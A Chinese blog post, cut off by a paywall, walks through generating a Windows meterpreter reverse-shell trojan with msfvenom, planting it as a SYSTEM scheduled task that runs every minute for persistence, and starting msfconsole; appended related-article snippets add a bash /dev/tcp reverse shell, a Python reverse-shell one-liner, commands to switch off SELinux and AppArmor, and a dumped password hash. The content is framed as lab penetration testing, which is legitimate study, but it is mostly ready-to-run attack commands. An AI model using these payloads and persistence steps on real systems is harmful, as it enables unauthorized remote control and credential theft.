kali监听win2008;反弹shell;msf生成木马;留后门;权限维持;

最新推荐文章于 2025-09-12 17:33:28 发布
原创 最新推荐文章于 2025-09-12 17:33:28 发布 · 1.5k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #java #网络

本文介绍如何使用Kali Linux生成木马文件,并通过计划任务定时执行实现远程控制。具体步骤包括配置生成的木马文件参数、设置Win2008系统的计划任务、配置Kali的监听工具等。

1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.94 LPORT=4455 -f exe > abcd.exe

 

 

2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;

注意abcd.exe路径;

schtasks /create /tn abc /sc minute /mo 1 /tr C:\Windows\system32\abcd.exe /ru system /f

 

在计算机管理里面可以看见

 

4、kali使用msfconsole工具进行渗透

┌──(root💀kali)-[~]
└─# msfconsole

 5、使用以下模块;


                

        

    


  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    

      

        

            

              
                
                  小乘杭
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
反弹shell---生成木马反弹shellWindows)

				
			

			

				

					weixin_50956890的博客
				

				

					05-04
					
					4494
					
				

			

		

		

			
				
Windows反弹shell的一种方式--生成木马

			
		

	



                

            
              



	

		

			

				
					
msf-Msfvenonm生成后门木马

					
热门推荐

				
			

			

				

					weixin_45588247的博客
				

				

					08-27
					
					2万+
					
				

			

		

		

			
				
msf-Msfvenonm生成后门木马实验
文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 :
一、工具:

Metasploit Framework(MSF)漏洞利用框架

二、实验环境:

靶   机: windows10虚拟机:192.

			
		

	



              


  
              

                


	

		

			

				
					
计算机网络安全实验-使用Kali进行Metasploit操作宿主机摄像头的相关操作步骤

				
			

			

				

					一些知识和经验
				

				

					11-27
					
					1086
					
				

			

		

		

			
				
以下是使用Kali IP为192.168.142.132进行Metasploit相关操作的步骤:一、生成Payload木马程序)在Kali终端中使用msfvenom命令生成针对Windows系统的恶意Payload,该Payload将在目标系统上运行并建立反向连接。命令示例:二、设置Metasploit监听启动Metasploit控制台:输入msfconsole。加载处理反向连接的模块:use exploit/multi/handler。

			
		

	





	

		

			

				
					
复现|使用Kali生成木马,渗透Windows系统

				
			

			

				

					Maricopig的博客
				

				

					05-13
					
					3646
					
				

			

		

		

			
				
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。

			
		

	



		

			
		



	

		

			

				
					
一文教会你用Kali无线ARP欺骗,实现消息监听和设备断网!黑客技术零基础入门实战教程

					
最新发布

				
			

			

				

					wholeliubei的博客
				

				

					09-12
					
					854
					
				

			

		

		

			
				
无线ARP欺骗与消息监听分析 本文详细介绍了无线ARP欺骗与消息监听的攻击过程及防御措施。主要内容包括: 攻击原理:利用ARP协议漏洞进行中间人攻击,截获目标设备通信数据。 攻击步骤: 查询目标网络信息(IP/MAC地址) 使用fping或nmap扫描活跃主机 通过arpspoof实施ARP欺骗攻击 开启IP转发功能维持目标网络连接 使用driftnet截获网络图片 通过ettercap获取HTTP/HTTPS账号密码 防御建议:使用加密网络、启用防火墙、定期更新系统等。 实验过程展示了完整的攻击链,包括断

			
		

	





	

		

			

				
					
kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹

				
			

			

				

					
				

				

					08-09
					
					1047
					
				

			

		

		

			
				
权限维持】创建后门、清除痕迹

			
		

	





	

		

			

				
					
利用msfvenom制作木马,并且反弹shell

				
			

			

				

					m0_64444909的博客
				

				

					09-14
					
					6844
					
				

			

		

		

			
				
msf

			
		

	





	

		

			

				
					
容器内反弹shell的51种姿势

				
			

			

				

					帮助别人等于帮助自己             ——MXi4oyu
				

				

					11-19
					
					1754
					
				

			

		

		

			
				
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
为什么要反弹shell?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向

			
		

	





	

		

			

				
					
kali linux权限维持,权限维持篇-NC后门

				
			

			

				

					weixin_39662594的博客
				

				

					04-29
					
					485
					
				

			

		

		

			
				
今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。前提拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。低权限的失败案例:后门安置上传NCKali中带有Windows下的NC。upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32解释一下为什么...

			
		

	





	

		

			

				
					
利用msfvenom生成木马文件反弹shell

				
			

			

				

					dreamthe的博客
				

				

					11-19
					
					4969
					
				

			

		

		

			
				
1.安装靶机和攻击机
首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。

kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。





攻击机 kali ip是192.168.3.138

靶机 win server 2008 R2 ip是192.168.3.147

...

			
		

	





	

		

			

				
					
靶机测试,kali生成windows木马程序

				
			

			

				

					2301_76361674的博客
				

				

					05-03
					
					1675
					
				

			

		

		

			
				
仅用于靶机测试!永恒之蓝:通过系统已有漏洞进行攻击,获得后门权限木马:通过将后门放到靶机上,获得权限

			
		

	





	

		

			

				
					
网络安全--反弹shell】注册机捆绑恶意程序上线MSF

				
			

			

				

					m0_67844671的博客
				

				

					05-30
					
					527
					
				

			

		

		

			
				
网络安全--反弹shell】注册机捆绑恶意程序上线MSF
声明:郑重声明,本篇博客仅供学习与参考,若学习的内容用的不当,所产生的后果自负!!

			
		

	





	

		

			

				
					
kali linux权限维持,msfconsole权限维持

				
			

			

				

					weixin_42297742的博客
				

				

					04-29
					
					559
					
				

			

		

		

			
				
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...

			
		

	





	

		

			

				
					
kali生成木马

				
			

			

				

					Massimo__JAVA的博客
				

				

					04-25
					
					2400
					
				

			

		

		

			
				
攻击机:kali  192.168.116.128受害机:win7  192.168.116.124目标:使用kali

			
		

	





	

		

			

				
					
kali无线渗透之监听wifi网络1_kali 查看wifi发送的信息(1)

				
			

			

				

					2401_84138890的博客
				

				

					04-07
					
					1037
					
				

			

		

		

			
				
是一个与802.11标准的无线网络分析有关的安全软件,主要功能包括网络侦测、数据包嗅探、WEP和破解。工具可以工作在任何支持监听模式的无线网卡上,并嗅探802.11a802.11b802.11g的数据。下面将对该工具进行详细介绍。是一个套件,在该套件中包括很多个小工具,如表3-2所示。

			
		

	





	

		

			

				
					
kali无线渗透之监听wifi网络1_kali 查看wifi发送的信息

				
			

			

				

					2401_84138890的博客
				

				

					04-07
					
					1308
					
				

			

		

		

			
				
链图片转存中…(img-wad44D67-1712503139519)][外链图片转存中…(img-Afr0SiIi-1712503139519)][外链图片转存中…(img-sMTGkY0o-1712503139519)]

			
		

	





	

		

			

				
					
kali监听不到反弹shell

				
			

			

				

					03-02
				

			

		

		

			
				
### Kali Linux 无法接收反弹 Shell 的解决方案

当遇到 Kali Linux 无法接收到反弹 Shell 的情况时,可能的原因涉及多个方面。以下是详细的排查和解决办法:

#### 1. 检查网络连接
确保攻击机(Kali Linux)与目标机器之间的网络连通性正常。可以使用 `ping` 或者 `traceroute` 命令验证两者之间是否有数据包丢失或路由问题。

```bash
ping 192.168.2.11
```

如果发现网络不通,则需进一步检查防火墙设置、路由器配置等问题[^1]。

#### 2. 确认监听端口状态
确认 Kali 上用于接收反弹 Shell 的端口号未被占用,并且已经启动了相应的监听服务。例如,在上述案例中提到的是 TCP 协议下的 6666 端口。可以通过 netstat 查看本机开放的端口列表以及对应的程序名称;也可以借助 nc (netcat) 工具开启一个新的监听实例。

```bash
sudo lsof -i :6666    # 查看指定端口是否已被其他进程绑定
nc -lvnp 6666         # 使用 NetCat 创建一个简单的TCP服务器等待客户端连接请求
```

#### 3. 验证命令执行路径
对于 `/bin/bash -i >& /dev/tcp/192.168.2.11/6666 0>&1 &` 这样的反弹 shell 命令来说,其依赖于 bash 解释器的存在及其绝对路径为 "/bin/bash" 。因此建议先单独运行一次该指令片段以排除因环境差异而导致的功能失效风险。

```bash
which bash           # 查询 Bash 实际安装位置
ls -l $(which bash)  # 获取符号链接指向的目标文件属性信息
```

#### 4. 排除 SELinux/AppArmor 影响
某些情况下,Linux 发行版自带的安全增强机制可能会阻止非法操作的发生。此时应临时关闭这些防护措施再尝试获取远程控制权。

```bash
setenforce 0          # 关闭SELinux强制模式
aa-disable profile    # 禁用 AppArmor 对特定应用程序的限制策略
```

#### 5. 测试不同类型的 Payload
考虑到实际环境中可能存在各种各样的安全设备会对流量进行监控分析处理,所以不妨多准备几种 payload 方案备用。比如采用 Python reverse_shell.py 脚本来代替传统的 Unix/Linux 下基于 execve() 函数调用来实现相同功能的效果。

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.11",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值